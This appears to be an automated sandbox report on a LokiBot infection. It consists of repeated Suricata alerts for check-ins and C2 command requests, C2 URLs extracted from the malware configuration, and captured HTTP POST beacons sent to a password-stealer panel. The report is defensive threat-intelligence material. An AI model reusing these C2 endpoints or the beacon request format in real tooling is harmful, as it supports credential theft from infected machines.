Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55931 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55931 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55931 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49749 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55941 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55941 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55934
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55940 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55897
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55914 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55960 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55931 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55941
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55931 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55904
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55991 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55960
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55991 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49747
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55937 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55937 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55937 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55991 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55991 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:56000 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55936
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55972 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55970 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55914 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55940 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55916 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55916 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55931
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55980 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55909 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55945 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55957 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:56000 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55914
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55972 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49737
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55970 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49738
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55980 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55970 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55940 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55946 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55903
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55916 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55954
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55970 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55946 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55970 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55946 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55909 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55901 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55901 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55918
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55916 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:56000 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55938 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55937 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55949 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55912
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55915 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:56000 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55972 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:56000 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55899
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55909 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55972 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55946
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55939 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55939 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55901 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55966 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55916 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55937 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55910 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55949 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55963
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55937
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55929 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55980 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55915
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55965 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55939 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:56000
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55977 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55945
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55910 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55942 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55940
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55910 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55901 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55939 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55929 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55968
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55957 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55910 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55923 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55923 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55970
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55962 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55978 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55978 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55976 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55976 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55976 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55964 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55964 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55999 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55964 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55999 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55906 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55906 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49749
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55964 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55973 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55973 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55901 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55973 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55916
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55949
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55905
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55957 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55910 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55966 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55966 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55938 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55909 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55962 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55948 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55962 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55948 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55948 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55977 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55962 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55964 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55962 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55939 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55911 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55973 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55901
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55950 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55978 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55999 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55991
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55910
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55909 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55980
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55906 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55976 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55978 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55965 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55907 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55965 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55907 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55907 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55906 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55911 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55965 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55911 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55948 -> 188.114.96.3:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: https://dddotx.shop/Mine/PWS/fre.php

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
